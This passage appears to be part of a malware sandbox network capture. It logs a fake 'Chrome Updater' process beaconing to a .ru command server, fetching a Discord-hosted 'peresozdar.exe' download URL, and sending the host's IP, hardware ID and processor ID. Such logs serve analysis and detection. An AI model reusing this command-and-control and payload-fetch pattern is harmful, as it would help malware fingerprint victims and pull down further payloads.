                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sCC8V5dyhzG4OdW8XlKfEzuZ1%2FEwdEmmAXSMFCXWo0%2Fwcy4Pr%2BdyxKllVPWArMMv8S6pPwRb%2BUnliK1bYDrCvOC9gZp9fOkj%2BxdTuMNyUBv9oS%2FTzcq3R4uaXd2WG27IvG6qVlpQ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7ab58140778-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:06 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    137192.168.2.649860104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:06 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:06 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:06 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2Lx6Eqy1vdK7PBFu%2FjDEpiUZ6vRhoJZ%2BXLwEcxUsaMFtK2dr%2FyO0y28nQX%2FvG24S6O9ol52EYfzHSyrLIV9%2Bl2qoY2QNS02tfuM04nV2v5ka35OmI8kk1dLo%2F1c2hnilIB2nWTDY"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7abba1d5979-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:06 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    138192.168.2.649861104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:06 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:07 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:07 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HUeS8EVKok2adr5%2BhI6DLyAGKl3qMM24MIQsVMoEitXwczFUO8LaBiZbSXl7WnX69b3ocBXWnOD7%2B4P%2FoNql8WXODZwU3fIL3B8i7aQYJLANOBYG1vNEeaGmIuNwz5r5oFXFSw6X"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7afbe840800-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:07 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    139192.168.2.649862162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:06 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:07 UTC1331INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:07 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7b11a423b24-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 51
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:07 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=E95nCx6fIT00iOI0tgeyrjqZjUuTOzlPKuykEB7QyyM-1704353467-1-AX+p1ukirrYvlVi7MkWl6+TZXICK95mmy4VW4tCM/BfARLUX+arj4oK3YqHAx6CuiEiBm4ps6863kPNdrGaqdgg=; path=/; expires=Thu, 04-Jan-24 08:01:07 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZklGWXob6jW3BB9ve7btsgK%2BdbZLhiL0l8Ro12T5S01CKX5rsfW0XuV3duumxydbjCAcP0A33QEseY8nxYJCnycO6saiBqTjcVxPbMegPFnA1s%2Bc2iaGjWHOIeHUooAt8b6Y7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=UQJDsiGwvPk94C4vuiqJSdZ9EMO7Zk5j75hhdvZSIA8-1704353467081-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:07 UTC38INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?>
                                                                                    2024-01-04 07:31:07 UTC198INData Raw: 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: <Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    140192.168.2.649863104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:07 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:08 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lkbzR6hsbHBStPmutRnQ98HM7X6Ae4y9v0RnIK%2FK1n2pGdmvsq447FfBwKzSTfOxBMj7TiArZJSma%2FnB4yYzQBfCELbr2LdBqJN%2Ff818qmnDvEHIIq8kBOJ389YnL%2BAVEuCbittl"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7b49f7582c0-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:08 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    141192.168.2.649864162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:07 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:07 UTC1338INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:07 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7b54d5d822a-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 40
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:07 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=bfeDNm9FWs5qGRDEdGNKEyVJZp7zQ_3CfxZtmHg0HQM-1704353467-1-AWYJi7VZs+63GbDI5Y7pywkKhVsBlTweJ8EGD5M+LWPMmUXRKPtoSH8za0bWXWYe/8RKHaNZXAlNz5wkoU1hOtQ=; path=/; expires=Thu, 04-Jan-24 08:01:07 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VqxRGe5k1TescCwS5iRp2wy5QJX%2F46Xl561sHx6k1gyOnQjs7ilx0Y4AU3gG9uxnAf61uRX7TBJjLpqkmgqBwFcgXdYXPE%2Fl2h3YifGvmWphDhaww2jBCA2aAZUoeIii3b5gxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=OjUwK19lfAhhlkXjVPBOQsaeKdUaJL39i8ZErcUX_VQ-1704353467749-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:07 UTC31INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55
                                                                                    Data Ascii: <?xml version='1.0' encoding='U
                                                                                    2024-01-04 07:31:07 UTC205INData Raw: 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: TF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    142192.168.2.649865104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:08 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:08 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l8a6VrodH161OhNtt5Pstr3%2BSoUuRPTmKe%2FIhIcrbKF5CCE6MBjulZWDbv609QraUpIXQvz4%2B1D2mu7rZnFPcZcZbOTSTaU0%2B4QJDm7ebCuInjOfpg%2F2mlSnMdR1cJmr5qianyZf"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7b8d8808203-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:08 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    143192.168.2.649866104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:08 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:08 UTC597INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mPtdObsg2UhkHo0PDq5Gd%2FsOL7sVD8bNgebiHqlFzuxCRP1h0sZPgbfRVpZODNzK74cweFR2pC2gnOxwgMwiMzSN3ELhrSJ8My5tdXjkejm3W1d%2BnUba4D5oqfoyiKymhRtLl5eR"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7ba3a473904-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:08 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    144192.168.2.649867104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:08 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:09 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:09 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ljq1uKbgq%2B4axFPBLQPPW%2FlDyqsYTd%2F%2BOTWHS1Jed9O%2FJVQecMAy6Tio4N8JL82lZesxH%2BsKy2bTohhpcv80Ul5JGDXnY4BCCka3qcgCBwHI8Hw1Mb1peZnQ66qwkKMSG1ib1fEX"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7bd4ab09c1f-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:09 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    145192.168.2.649868162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:09 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:09 UTC1344INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:09 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7bf9ada829e-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 42
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:09 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=IPxQfdbFFWoHRAUKCtAomdpbMls1CFA4Bgl1YWfWtuU-1704353469-1-AcBLh5Sl1lh6AH96EhTuPAPKG/oqXFZDHZBEwc0IcPFXenlSdSVmw4cMf3F+dumKSDW2xJTiFCL+t1M/r1Y0+dI=; path=/; expires=Thu, 04-Jan-24 08:01:09 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bQ9MINtKPV39rubrtu%2FB3bqC9DVfaW0wJOu9HvVJahjW8fmAVflBETVhtKsLtv3TfdPNuBMDBF6kgWBt0iqpbNADCjz%2FNM%2B%2Buyz26HFToUFP%2F68qnYrpzViOO9oZEt0npXwaRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=drcbyrlCmOEoBogphOyDF2S06FPxq.7v9CctZ1mxow0-1704353469405-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:09 UTC25INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64
                                                                                    Data Ascii: <?xml version='1.0' encod
                                                                                    2024-01-04 07:31:09 UTC211INData Raw: 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ing='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    146192.168.2.649869162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:09 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:09 UTC1338INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:09 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7c2db8a5b3b-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 29
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:09 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPoZOmZ85WzNRXjW2ndttcfb4eP9EIBBMbydtvRdPl58LDIjN51wGDYCvkXSZyQ0wMNTHA
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=M6m_.lj9s9Qz6GFJGL_qsw8xxz6pXLKK5Omt6bOLjF8-1704353469-1-AZN4/RT5NagutRkwQAprSlOT371BNI1DEWWInuAZqjetKuuwxAssR2l4QfnKPYx6ghP/IZ/wh33S8FZsm1bRBso=; path=/; expires=Thu, 04-Jan-24 08:01:09 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1jIq0kjAKbvCh9FHwFHBEOTGy2gapuYgK%2BAWe6mRh33itL3Sw%2FY1xbI2yAf1nfvK%2BcixYRIlScRyyomwu5o%2FcmEJq%2B0jO8JMkity7oRUVpyQahd2ogOvR%2FWwy5NY3RzTowvsxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=7aE3VW9JXg334vjosPsy5scfy1M1uY5pgtSmVzxyINk-1704353469947-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:09 UTC31INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55
                                                                                    Data Ascii: <?xml version='1.0' encoding='U
                                                                                    2024-01-04 07:31:09 UTC205INData Raw: 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: TF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    147192.168.2.649870104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:09 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:10 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:10 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
